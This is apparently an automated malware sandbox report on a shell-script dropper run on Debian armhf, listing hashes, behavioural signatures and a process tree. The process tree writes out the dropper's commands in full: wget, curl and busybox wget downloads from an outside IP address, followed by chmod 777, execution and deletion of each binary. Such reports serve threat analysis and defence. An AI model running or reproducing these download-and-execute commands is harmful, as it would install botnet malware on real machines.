Analysis
-
max time kernel
21s -
max time network
22s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
10-11-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
-
Size
10KB
-
MD5
0aab00d4e7063c05a4a2623bcf37a039
-
SHA1
f155f96de5ba4dba0e81f04fc0b9739488955248
-
SHA256
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574
-
SHA512
e4d19d1c05c96c81636e67f4a78b9021ac9ee306b17c30fbdf68f0f3bc52d9a0b7a2d1fb6706b5a507f7b1bbca57e1a2c5875c4dbe57c90cb180aeeafc800b0c
-
SSDEEP
192:U4GT9Uq+r7f9jOytEsjARO9Uq+r7fOOytEsOQ:U4GmJ/ARHfQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 18 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 851 chmod 801 chmod 827 chmod 752 chmod 819 chmod 680 chmod 721 chmod 789 chmod 833 chmod 741 chmod 773 chmod 795 chmod 807 chmod 813 chmod 839 chmod 845 chmod 671 chmod 700 chmod -
Executes dropped EXE 18 IoCs
Processes:
d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMOb4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0JV0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpvtrEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAVz0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7Bqf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVRpgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3ymHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnFhwWR62XfsZaEQXPNSWWZ2esDst57v7Zudlnna1tBnMuEdluE4QBbRNp9nEdX5f9IHiugqScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAVz0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7Bqf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yucioc pid process /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO 673 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J 682 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv 702 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 723 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt 742 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV 753 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B 774 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc 790 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR 796 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 802 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y 808 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF 814 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl 820 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug 828 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt 834 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV 840 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B 846 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc 852 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc -
Checks CPU configuration 1 TTPs 18 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 18 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc curl File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 curl File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y curl File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl curl File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV curl File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO curl File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv curl File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 curl File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt curl File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt curl File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF curl File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc curl File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B curl File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J curl File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV curl File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B curl File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR curl File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug curl
Processes
-
/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh1⤵PID:639
-
/bin/rm/bin/rm bins.sh2⤵PID:641
-
/usr/bin/wgetwget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:647
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:659 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:668
-
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:671 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:673 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:674
-
/usr/bin/wgetwget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:675
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:676 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:677
-
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:680 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:682 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:683
-
/usr/bin/wgetwget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:685
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:690 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:696
-
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:700 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:702 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:703
-
/usr/bin/wgetwget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:705
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:708 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:715
-
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:721 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:723 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:724
-
/usr/bin/wgetwget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:725
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:732 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:739
-
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:741 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:742 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:743
-
/usr/bin/wgetwget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:744
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:745 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:746
-
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:752 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:753 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:754
-
/usr/bin/wgetwget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:756
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:761 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:768
-
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:773 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:774 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:775
-
/usr/bin/wgetwget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:777
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:783 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:788
-
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:789 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:790 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:791
-
/usr/bin/wgetwget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:792
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:793 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:794
-
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:795 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:796 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:797
-
/usr/bin/wgetwget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:798
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:800
-
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:801 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:802 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:803
-
/usr/bin/wgetwget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:804
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:806
-
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:807 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:808 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:809
-
/usr/bin/wgetwget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:810
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:812
-
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:813 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:814 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:815
-
/usr/bin/wgetwget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:816
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:817 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:818
-
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:819 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:820 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:821
-
/usr/bin/wgetwget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:822
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:826
-
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:827 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:828 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:829
-
/usr/bin/wgetwget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:830
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:831 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:832
-
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:833 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:834 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:835
-
/usr/bin/wgetwget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:836
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:837 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:838
-
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:839 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:840 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:841
-
/usr/bin/wgetwget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:842
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:843 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:844
-
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:845 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:846 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:847
-
/usr/bin/wgetwget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:848
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:850
-
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:851 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:852 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:853
-
/usr/bin/wgetwget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:854
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97